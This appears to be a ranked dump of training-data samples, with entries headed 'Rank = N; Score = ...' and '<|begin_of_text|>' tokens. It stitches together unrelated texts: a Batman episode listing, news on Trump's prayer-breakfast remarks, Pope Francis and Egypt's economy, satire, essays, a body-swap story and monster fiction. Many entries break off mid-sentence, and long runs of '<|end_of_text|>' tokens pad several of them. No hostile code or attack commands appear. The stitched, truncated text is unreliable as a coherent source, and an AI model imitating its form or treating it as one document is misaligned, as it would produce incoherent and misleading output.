"P.O.V." Kevin Altieri Story by : Mitch Brian + +Teleplay by : Sean Catherine Derek and Laren Bright September 18, 1992 ( ) The Drug Lord + +and his Gangsters + +A botched police operation results in the suspension of those involved: Officer Wilkes, Officer Montoya, and Detective Bullock. Confronted by their superiors, each of them is forced to tell their tale of what happened that night. The episode is similar in structure to Akira Kurosawa's film Rashomon. + +8 8 "The Forgotten" Boyd Kirk +================================================================================ +Rank = 14; Score = 1212416.0 +<|begin_of_text|>CLOSE Speaking at the National Prayer Breakfast, President Trump razzes 'The Apprentice' producer Mark Burnett about the show's ratings under new host Arnold Schwarzenegger. Burnett introduced Trump at the breakfast. USA TODAY NETWORK + +President Trump speaks during the National Prayer Breakfast on Feb. 2, 2017, in Washington. (Photo11: Evan Vucci, AP) + +Speaking at a National Prayer Breakfast unlike most before it, President Trump on Thursday said the nation has to be "tougher" in dealing with other countries, pledged to make it easier for religious groups to engage in politics — and asked the crowd to pray for his successor as host of The Apprentice. + +"The ratings went down the tubes" since Arnold Schwarzenegger took over as host of his former program, Trump said. "It's been a total disaster... And I want to just pray for Arnold, if we can, for those ratings, OK?" + +Schwarzenegger responded by Twitter, offering to switch jobs with Trump so that "people can finally sleep comfortably again." The former California governor headlined his tweet, "The National Prayer Breakfast?" + +In his remarks at the breakfast, Trump constantly referenced himself, talking at one point about how people often greet him with five words that warm his heart: "I am praying for you." He also said "so many faith leaders" have been "very, very important people to me." + +At another point, Trump referenced foreign policy, telling members of the prayer breakfast not to worry about reports of his "tough" phone calls with world leaders. + +"We're (being) taken advantage of by every nation in the world, virtually," Trump said. "It's not going to happen anymore." + +Read more: + +Trump also defended his temporary ban on travel to the United States from seven Muslim majority nations, calling it a counter-terrorism measure. He suggested, as he did during the campaign, that future migrants may be given some sort of test to demonstrate their commitment to American values. + +The administration is developing "a system to help ensure that those admitted into our country fully embrace our values of religious and personal liberty, and that they reject any form of oppression and discrimination. We want people to come into our nation, but we want people to love us and to love our values, not to hate us and to hate our values." + +During the foreign policy discussion, Trump said: "The world is in trouble, but we can straighten it out, OK? That's what I do — I fix things." + +Praising the military +================================================================================ +Rank = 15; Score = 1187840.0 +<|begin_of_text|>Don’t you just love that moment of returning consciousness when you wake up? + +It’s a little shock, followed by a moment of snoozing. + +Shortly after comes the feeling that something isn’t right, you wake up a little more and figure out things are okay after all, and return to peaceful snoozing. + +Not today. Not fucking today. + +Oh sure, most of it was the same as every other time, but then I realized that what I saw was not my nightstand, nor the cabinet on the other wall. + +From what I could see I was in a hospital room. + +I was drunk yesterday but not to the point that I blacked out. + +I remember standing up from behind my computer at two in the morning, walking to the toilet and emptying my bladder while leaning on the wall. + +Heck, I even remember crawling up the stairs and into bed next to my wife. Did I have an accident overnight? + +I tried to get up on my elbows, only to be shocked that they were not where I expected them to be. + +I moved my hand up to my face and smashed it against my nose. + +The big shock came when I tried to move my arm again, more careful this time, and saw a little hand. + +A baby’s hand. What was this? + +I tried to talk and all I could manage was a soft cry, almost a whimper. + +I screamed and the cry got louder, but this was not my voice. + +My heart felt like an ice cold hand took hold of it and my throat froze up to the point that I could not swallow. + +For a moment I believed I was in a nightmare and could wake up every second now, but none such thing happened. + +I tried to get up but kept failing time after time. I tried to roll around and kick but my legs were firmly bound inside a blanket. + +At last, I kept screaming. I screamed till my throat hurt and my eyes were full of tears. + +I don’t know for how long I screamed but after some time I saw a nurse walking towards me. + +As she came closer I stopped screaming and she started talking: + +“Hey buddy, what a smart little fellow you are! Are you hungry? Let’s go see your mother!”. + +My surroundings began to move and it took me a moment to realize I was actually in a baby bed on wheels, a plastic tub with a mattress in it. + +We drove past other little beds on wheels and into a long hallway. + +We were stopped a few times by people telling me that I was cute +================================================================================ +Rank = 16; Score = 1138688.0 +<|begin_of_text|>Diane Ackerman on the natural world, the world of human endeavor and connections between the two. + +IT was only a matter of time. Plants have begun texting for help. Thanks to clever new digital devices, a dry philodendron, undernourished hibiscus, or sadly neglected wandering Jew can send its owner a text or Twitter message. Humans like to feel appreciated, so a begonia may also send a simple “Thank-you” text — when it’s happy, as gardeners like to say, meaning healthy and well-tended. Picture your Boston fern home alone placing Botanicalls. But why should potted plants be the only ones to reassure their humans? Another company has found a way for crops to send text messages in unison, letting their farmer know if she’s doing a good enough job to deserve a robust harvest. What is the sound of one hand of bananas clapping? Probes monitoring the soil can send a range of prerecorded messages specific to each plant’s needs. + +Ping Zhu + +Plants texting humans may be new, but malcontent plants have always been chatting among themselves. When an elm tree is being attacked by insects, it does the chemical equivalent of broadcasting “I’m hurt! You could be next!” alerting others in its grove to whip up some dandy poisons. + +If a human kills with poison, we label it a wicked and premeditated crime, one no plea of “self-defense” can excuse. But plants dish out their nastiest potions every day, and we wholeheartedly forgive them. They may lack minds, or even brains, but they do react to injury, fight to survive, act purposefully, enslave giants (through the likes of coffee, tobacco, opium), and gab endlessly among themselves. + +Strawberry, bracken, clover, reeds, bamboo, ground elder and lots more all grow their own social networks — delicate runners (really horizontal stems) linking a grove of individuals. If a caterpillar chews on a white clover leaf, the message races through the colony, which ramps up its chemical weaponry. Stress a walnut tree and it will brew its own caustic aspirin and warn its relatives to do the same. Remember Molly Ivins’s needle-witted quip about a Texas Congressman: “If his I.Q. slips any lower, we’ll have to water him twice a day”? She clearly misjudged the acumen of plants. Plants are not mild-mannered. +================================================================================ +Rank = 17; Score = 1105920.0 +<|begin_of_text|>Neighbors in Johnstown, Pa., called police when they witnessed the young mother outside taking off her clothes and lying naked on the ground. But police arrested and jailed the woman, identified as Ashley Whisman, 26, of the city's West End, for what they allegedly found inside toys belonging to the woman's three-year-old child. Namely, drugs and drug paraphernalia. + +NorthlandsNewsCenter.com reports that police said Whisman's speech was slurred, her arms were covered in track marks, scratches and lesions. On her way to the hospital, police said she tried to hide a baggie of marijuana and a needle, the website adds. + +The 3-year-old allegedly told EMS he was very hungry, the station reports. And among the child's toys, police found drug paraphernalia, marijuana bongs, grinders and even syringes, the website writes. + +Whisman faces drug and child endangerment charges.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 18; Score = 1097728.0 +<|begin_of_text|>WASHINGTON (The Borowitz Report)—Three men alleged to be prominent Russian spies inexplicably gained access to the Oval Office last week and held a high-level meeting there, according to reports. + +Eyewitnesses to the meeting said that the three Russian agents spoke at length and shared sensitive intelligence material, at times laughing uproariously. + +After approximately an hour, the meeting broke up, with two of the spies leaving the Oval Office and the third remaining behind. + +News that agents of the Russian Federation had somehow eluded the Secret Service in order to hold a meeting in the Oval Office sent shock waves through Washington on Monday evening. + +“The fact that three well-known Russian agents were able to hold a meeting in the Oval Office suggests that something has seriously broken down,” Harland Dorrinson, a national-security official who served in the Reagan and Bush Administrations, said. “None of these three men should be anywhere near the White House.” + +On Capitol Hill, House Speaker Paul Ryan called the meeting of the three Russian spies at the White House “a tempest in a teapot” and “much ado about nothing,” before adding, off-microphone, “I am screwed. I am so screwed.”<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 19; Score = 1089536.0 +<|begin_of_text|>Pope Francis criticized Catholics who live a double life, suggesting that it is better to be an atheist than a hypocritical Christian. + +Francis made the comments Thursday during his private morning mass at his home in Casa Santa Marta in Vatican City. + +"Scandal is saying one thing and doing another; it is a double life," he told attendees, according to a transcription from Vatican Radio. + +He continued: + +"‘I am very Catholic, I always go to mass, I belong to this association and that one; but my life is not Christian, I don’t pay my workers a just wage, I exploit people, I am dirty in my business, I launder money …’ A double life. And so many Christians are like this, and these people scandalize others. How many times have we heard — all of us, around the neighbourhood and elsewhere — ‘but to be a Catholic like that, it’s better to be an atheist.’" + +Francis' comments followed his mass readings, which included a passage from the Gospel of Mark that read, "If your hand causes you to sin, cut it off." + +Pope Francis delivers his homily during his weekly general audience at St. Peter's Square in Vatican City on Wednesday. (Photo: Giuseppe Ciccia/Pacific Press/LightRocket via Getty) + +The day before he made the comments, the Pope tweeted the gates of heaven should be open, not closed. + +Jesus entrusted to Peter the keys to open the entrance to the kingdom of heaven, and not to close it. — Pope Francis (@Pontifex) February 22, 2017 + +It's not the first time the Pope has suggested atheists shouldn't be seen as sinners if they do good. + +In 2013, shortly after he his papacy began, Francis hinted during a mass that non-believers can be redeemed as long as they "do good." + +However, some atheists poked fun at the Pope's remarks. + +Reminder that the Pope thinks atheists are only one step up from the worst of practicing Christians. Proud atheist 💪 https://t.co/DdPVRSOlLF — Max Lynch (@maxlynch) February 23, 2017 + +As an atheist, I suppose I should return the 'compliment.' It's better to be the pope than a malevolent, homicidal atheist. https://t.co/ggIU8UKqWG — Ronald A. Lindsay (@RALindsay) February 23, 2017 + +Follow The Huffington Post Canada on Facebook, Twitter, +================================================================================ +Rank = 20; Score = 1064960.0 +<|begin_of_text|>Amid Economic Crisis, Even Sugar Becomes A Luxury In Egypt + +Enlarge this image toggle caption Amr Nabil/AP Amr Nabil/AP + +At the huge weekly market on the outskirts of Cairo, live chickens crowd wooden cages next to tables piled with ruby-red pomegranates, deep-orange persimmons and baskets of fresh dates from the countryside. + +But as Egypt endures its worst economic crisis in decades, many shoppers can barely afford the tomatoes and cucumbers that are a staple of the poor. They hurry past to a nearby square in the hope of buying cartons of government-subsidized food. + +Egypt is the Arab world's most populous country, with more than 90 million people, and one of the world's biggest food importers. The protests that swept Egypt and the Arab world five years ago and frightened off foreign investors and tourists collided with decades of a deeply inefficient, state-controlled economy. + +After the Egyptian government loosened exchange rates this month, the official value of the Egyptian pound plunged by almost half. One U.S. dollar bought less than nine Egyptian pounds before the devaluation, and these days buys more than 17 pounds. That means that anything imported — from sugar to medicine — became much more expensive and many items disappeared from the market. + +"I went to all the shops and even if you can afford to buy sugar you can't find it," says Saleh Attiya, a furniture maker out shopping with his son. + +"A kid like that — how will he drink his milk without sugar?" he said, pointing to 6-year-old son, also named Saleh. Attiya the father freely admits that his own missing teeth could be due to his habit of drinking each small glass of tea with four or five spoons of sugar. But for millions of Egypt's poor, sugar has been the only luxury they could afford. + +To ease the hardship of rising prices and broad subsidy cuts required by a $12 billion bailout from the International Monetary Fund, the Egyptian government sent the army into neighborhoods with 8 million food boxes at bargain prices. Egypt's official figures indicate almost one-third of Egyptians are in poverty, defined as living on about $50 a month or less. + +Near the weekly market, a crowd of Egyptians, many of them elderly, crowded around a truck with subsidized food packages for sale. They sold out within minutes, leaving people shouting, "I want a carton!" and holding up tattered bills even as soldiers slammed shut the doors of the empty truck. + +The lucky ones walked away with a cardboard +================================================================================ +Rank = 21; Score = 1056768.0 +<|begin_of_text|>June 1, 2009 + +IF KIM Jong-Il has an imaginative public relations office, he'll issue a statement that setting off another nuclear weapon was due to a simple mistake as he was confused about which missile he'd registered as his second one, and it was all within the rules, but he's sorry if anyone's upset and it goes to show this ghastly system needs to be jolly well reformed. + +This would be more plausible than the now-famous interview by the member of parliament who protested that complaints about his expenses were driven by "jealousy" because his house "looks like Balmoral" and "does me nicely," ending with a flourish by snarling, "What right has the public to interfere in my private life? None." + +He was so absurdly beyond his own stereotype, if it had carried on he'd have said, "I require substantial grounds in order to carry out the annual event of hunting a farmhand and roasting him on a spit, and no do-gooder of common stock will tell me otherwise." + +But the most annoying thing when listening to these types is not their own arrogance, but that the mainstream view of modern Britain, including the idea on which New Labour was founded, is that class division belongs only in the past. + +Columnist: Mark Steel Mark Steel is a comedian, a columnist for the Independent newspaper, and a socialist and activist in Britain. He's the author of two collections about contemporary Britain, It's Not a Runner Bean: Dispatches from a Slightly Successful Comedian and Reasons to Be Cheerful--as well as Vive la Revolution: A Stand-up History of the French Revolution. + +So when you go past a housing office on a council estate that's full of disgruntled tenants, they must all be yelling, "When are you bastards gonna come and repair my duck island? It's three weeks since I reported it was leaking, where are my bleeding ducks supposed to rest when they're half way across my pond, they're getting knackered, now sort it." + +And Job Centers will be packed with claimants crying, "I can't survive on £68 invalidity benefit. Out of that I've got to pay for council tax, heating, food, moat cleaning, I've already got the portcullis going rusty, I'm desperate." + +And if a single parent on housing benefit was questioned about why they hadn't declared a morning's work, they could say to the fraud officer, "Do you know +================================================================================ +Rank = 22; Score = 1056768.0 +<|begin_of_text|>Whether we know it or not, we are all of us, all the time, oppressed by the kind of power exercised, ostensibly at least, in the name of organising society and holding it together. When I think about “power” in this sense – of a vaguely oppressive force bearing down upon me – it’s easy to ignore its encroachment, or to brush any such nagging feelings aside and decide that my unease is a collateral price for other freedoms. This is lethal to the human person. + +Oppression of this kind is not something distant, but ever-present in my psyche and body. Much of it may well seem necessary, but sometimes it crosses a line. And the experiencing of that intrusion may in each of us arise differently: for one, in a “big” thing; for another, in a “small” thing. It’s always personal. Freedom is not necessarily epic. Only in the “I” – the absolute subjectivity which is my only accurate apparatus of judgment – can this be decided. No one else can make this decision for me. + +There are no small freedoms, but one great freedom, spread over the totality of a life in reality. + +In his essay The Power of the Powerless, Vaclav Havel took for granted this idea that freedom is not a matter of the absence of tanks in the streets. + +Havel was not, as is sometimes suggested, merely an “anti-communist” writer and intellectual whose work relates to one period of history. His themes, always, were universal, timeless, though demonstrated in a specific political and ideological context. His subject, really, was the soul of man under any kind of system seeking to extinguish it. + +A central motif of The Power of the Powerless is the story of the greengrocer required by the governing ideology to place a sign in his shop window bearing the slogan: “Workers of the World, Unite”. The sign, Havel observes, might just as easily read: “I am afraid and therefore unquestioningly obedient”, but this would cause the greengrocer to lose face. The message relates to the reigning ideology, which nobody really believes in, but its unquestioning promulgation becomes, for the greengrocer, both an outward show of loyalty and a way of saving face. By displaying the sign, the greengrocer has shown his willingness to enter into the prescribed ritual of pretence, colluding in his own enslavement, acquiescing in the “blind automatism which drives +================================================================================ +Rank = 23; Score = 1048576.0 +<|begin_of_text|>In the fantastic realm there are hundreds of dangerous creatures, among them we find the giant spiders. Arachnids that get as big as a tree. Most of them dangerous and aggressive, but at the same time most of them are not a direct threat to humans. But there's one of them that makes theexception.The Battered Wife, as originally named. Oras called by the common folk. Why? because this creature will destroy your throat before you can sayThe Battered Wife is a spider that chose populated cities as its natural habitat. Thousands of years of refined evolution have created the perfect disguise on which this arachnid can prey on its preferred target. Humans. The Battered Wife as the exact resemblance of a young woman in a long dress with a hood. But that's not why it's the most dangerous creature of the alley. It's because she not only looks like a hurt lady in distress, but can actually act like one. This spider doesn't talk, but moans exactly as someone that just got stabbed in the stomach. It also recreates the same posture and it shivers as someone scared to death. The Battered Wife is a basic creature with the wits of any other animal. But that little brain has the enough intelligence to use hair and blood from its last victim to get the realism it wants.The Battered Wife nests in the sewers or abandoned houses, it can live to 30 years and spawn every 6 years hundreds of eggs. This means that one single female can spawn over 3 thousand spiders in its life time. The Battered Wife feeds only on humans and as it grows it eats absolutely nothing until it reaches full maturity and can be able to hunt. In between that, almost all of the little spiders die from other predators or starve before they get to kill anything. So that's why this hardly gets as a plague and will never become a threat to our specie. The only big problem is (as this b*tch isn't already one) that its growth is extremely fast. In a few months it can get to full size. And since it hasn't eaten anything and it's hungry, it will make the best performance ever in order to eat a full grown man.The rumor tells that there's a crazy scientist around that experiments on animals, and one of them was a Battered Wife he altered into a different breed. They call it The Battered Mother in Law. Why? Because the motherf*cker has wings... and flies. But luckly for us +================================================================================ +Rank = 24; Score = 1036288.0 +<|begin_of_text|>If Amazon's voice-powered Alexa devices were a bit more introspective, it would be fascinating to ask them why they're so popular. After all, geniuses world-wide have tried for decades to meld speech and artificial intelligence. It's a daunting task, yet Amazon has nailed the full package. + +By its own tally, Amazon has sold "tens of millions" of Echoes, Dots and other Alexa devices since coming to market in late 2014. In May, a top consumer-technology researcher, Bob O'Donnell of Technalysis Research, estimated that Amazon has won 70.9% market share in what he calls the smart-speaker sector. Google is second with about 26%; other aspiring contenders such as Apple, Microsoft and Samsung are still trying to organize their official launches. + +Time to peek behind the curtain. After interviewing a variety of Amazon Alexa insiders at both the company's Seattle headquarters and its Cambridge, Mass., research hub, I pieced together an analysis of Alexa's edge in an MIT Technology Review magazine article. + +Five factors stand out, including several that have surprisingly little to do with the actual speech science and AI inside Alexa.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 25; Score = 999424.0 +<|begin_of_text|>A congressman was seated in first class next to a little girl on an airplane. He turned to her and said, "Do you want to 